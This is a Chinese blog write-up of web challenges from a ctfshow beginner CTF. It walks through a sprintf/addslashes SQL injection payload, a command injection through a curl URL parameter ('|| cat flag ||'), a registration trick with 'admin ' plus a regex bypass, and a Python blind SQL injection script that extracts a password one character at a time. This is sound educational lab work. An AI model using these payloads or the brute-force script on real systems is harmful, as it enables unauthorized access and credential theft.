ctfshow 萌新赛 web部分

最新推荐文章于 2024-05-23 12:45:49 发布
最新推荐文章于 2024-05-23 12:45:49 发布
阅读量102 收藏
点赞数
分类专栏: # ctf 文章标签: sql mysql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74427106/article/details/134896594
版权

给她

打开网页,网页内容如下

登陆就能进入下一关
??where is 参数??
当前执行的SQL语句为:select * from user where name='' and pass=''

扫一下发现有好多.git相关的目录,在结合题目给她想到了git泄露

用工具githack扫一下得到hint.php这个文件,内容如下

<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>

sprintf格式化字符串漏洞,就是sprintf会将不认识的字符置为空,这里利用sprintf这个功能去将addslashes这个函数会将单引号和双引号用转义字符/转义所以最终playload

?name=admin&pass=%1$' or 1=1--+

addslashes会将'这个字符进行转义,而转义之后就构成了%1$\' or 1=1 --+

而sprintf不认识这个%1$\这个字符就会将它置为空

签到题

打开网页,得到源码

<?php 
if(isset($_GET['url'])){
        system("curl https://".$_GET['url'].".ctf.show");
}else{
        show_source(__FILE__);
}
 ?>

关于curl的命令执行

?url=|| ls ||
?url=|| cat flag ||

即可得到flag

假赛生

打开网页,得到源码

<?php
session_start();
include('config.php');
if(empty($_SESSION['name'])){
    show_source("index.php");
}else{
    $name=$_SESSION['name'];
    $sql='select pass from user where name="'.$name.'"';
    echo $sql."<br />";
    system('4rfvbgt56yhn.sh');
    $query=mysqli_query($conn,$sql);
    $result=mysqli_fetch_assoc($query);
    if($name==='admin'){
        echo "admin!!!!!"."<br />";
        if(isset($_GET['c'])){
            preg_replace_callback("/\w\W*/",function(){die("not allowed!");},$_GET['c'],1);
            echo $flag;
        }else{
            echo "you not admin";
        }
    }
}
?>

在题目已经提示了有两个页面,一个是register.php,一个是login.php去访问这两个页面,访问之后一个是注册页面,一个是登录页面,在注册页面用admin发现注册不成功,用admin+空格发现能够注册成功了,在用admin和你注册的密码进行登录发现能够登录成功,登录之后,我们在回过头开始分析代码,一个最重要的代码就是

preg_replace_callback("/\w\W*/",function(){die("not allowed!");},$_GET['c'],1);

这个正则表达式过滤

这个w和小写的W把全部字符都给过滤了,这就利用一个新的姿势,就是用不输入进行过滤

?c=""

这样就可以绕过正则得到flag

萌新记忆

打开网页可以看到四个小故事,但小故事没有啥用,用字典扫一下,得到了admin这个目录,访问一下获得一个登录页面,这里有三种情况,通过测试得到密码是17位,直接上脚本进行爆破,测试语句'||length(p)<'5

import requests

flag = ''
for i in range(1, 18):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz':
        url = "http://daabc47e-58a5-44d9-9838-9767cefb49f4.chall.ctf.show/admin/checklogin.php"
        data = {"u": "'||substr(p,{},1)<'{}".format(i,j),
                "p": ""
                }
        # print(data)
        c = requests.post(url, data=data)
        # print(c.text)
        if '用户名' not in c.text:
            flag += chr(ord(j)-1)
            print(flag)
            break

亲手擦亮那星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow萌新web17
qq_45829213的博客
02-20 2188
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/php/i",$c)){ include($c); } }else{ highlight_file(__FILE__); } ?> c传参过滤掉php 思路:include文件包含,利用日志文件包含 访问日志文件: ?c=/var/log/nginx/access.log 发现日志文件记
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow之_萌新web9至web10
XiaoXiao_RenHe的专栏
05-09 433
ctfshow之_萌新web9至web10
ctfshow-web萌新(详解)
m0_63641882的博客
11-06 325
1.addslashes函数+sping的漏洞2.cookie的盗用3.代码审计+正则过滤。
ctfshow萌新计划类web全解 wp
arcuied
11-25 1377
ctfshow萌新计划类web全解 wp
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 578
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTFShow:萌新web1
weixin_64089259的博客
04-14 908
第一次做web1题目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【描述】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 描述部分并未提供具体细节,但我们可以推测这道题目的核心是考察选手对于PHP中的变量处理,特别是涉及到循环结构时如何正确地处理变量取值。在PHP中,循环...
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow萌新经验总结
m0_62422842的博客
06-05 1708
涉及到的相关知识: sql注入中的sprintf格式化字符串漏洞。 基于约束的sql注入攻击。 利用Burpsuite Fuzz实现sql注入
CTFshow_萌新解题
ymx520haha的博客
04-24 1367
得到字母,但不是flag,看到作者名字是培根,想到了培根密码,将A替换m,B替换d,AABBABABAAABBBABABBAAAAAAABBABAABBA得到,进行解密得到guowang,改为大写提交flag成功。下载完发现是一个音频文件,用au打开,发现一段长短波,考虑为摩斯(-- ..- --.. .. -.- .. ... --. ----- ----- -..)看代码,发现存在命令执行漏洞,尝试构造得到flag,使用system(“cat config,php”),f12看源码得到flag。
ctfshow web 萌新
最新发布
2301_81040377的博客
05-23 321
这里有个name是admin,我们就注册就行了,后面加个空格绕过。然后登录之后传c为空就有flag。得到flag还要解密,我都忘了。同时发现多了个cookie。用githack还原文件。不行有点搞笑,感觉像qj。
ctfshow-萌新-web5( 利用位运算符控制SQL获取网站敏感信息)
热门推荐
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 we5关,这一关考察的是intval()函数转换字符串的特性和SQL注入的绕过思路,这一关过滤了单双引号,or,斜杠,加减乘除号,叹号,括号,select等关键字,推荐使用取反运算符(~)来控制SQL语句,获取flag 页面中展示了部分源码,提示我们 id=1000时,即可拿到flag 首先分析一下解题的思路,源码中过滤了参数中的 ‘ ” or \ - / * < > ! x hex ( ) select 等关键字,那我们不包含这些关键字就行了;...
ctfshow 萌新22 (类似级客巅峰web4)
Firebasky的博客
10-07 3289
在之前ctfshow平台的萌新22,大家都认为是无解的,题目也介绍了"还能搞,阿呆表示将直播倒立放水"。但是在级客巅峰结束的那天晚上,群里的师傅介绍说,如果修改了php.ini里面的配置(register_argc_argv)可以做出来。最后是真的做出来了。 使用阿呆~~~? 下面是自己的思考,感谢Guoke师傅和ha1c9on师傅的帮助 一. 源代码 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_mat.
ctfshow萌新计划web22
qq_46041723的博客
12-10 3029
ctfshow萌新计划web22前言正文web22 前言 上次做题,直接瞄准ctfshow萌新计划开炮,结果没打完,这次来补充一下。 正文 web22 打开题目,发现了源码 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\:|\/|\\\/i",$c)){ include($c.".php"); } }else{ highlight_f
ctfshw (萌新)
qq_62046696的博客
06-21 619
目录萌新记忆签到题web_假生发现页面都没什么可利用的,尝试访问别的页面,用dirsearch可以扫描出/admin/目录,没错,是扫出目录而不是一个页面,所以访问的时候别忘记admin后面加/ (多么菜的领悟>_......
ctfshow web萌新
09-01
你好!对于CTF Show的web,作为一个萌新,你可以尝试以下几个方向来提升自己的能力: 1. 学习Web基础知识:了解HTTP协议、HTML、CSS、JavaScript等基础知识,并掌握常见的Web漏洞类型和攻防技巧,如跨站脚本攻击(XSS)、SQL注入、文件包含等。 2. 掌握常见的Web安全工具:学习使用常见的Web安全工具,如Burp Suite、SQLMap、Nmap等,这些工具可以帮助你发现和利用Web漏洞。 3. 阅读相关资源和学习资料:阅读CTF比中常用的Web题目的writeup,了解解题思路和方法,同时积累一些常见的技巧和经验。 4. 刷题练习:参加一些CTF平台上的Web题目训练,刷题是提高自己技能的有效途径,通过不断的练习和挑战来提升自己的能力。 5. 参加线下或线上的CTF比:参加真实的CTF比是检验自己水平和提高技能的重要途径,比中可以学到很多实战经验。 希望以上建议对你有所帮助,祝你在CTF Show的web中取得好成绩!如果还有其他问题,欢迎继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值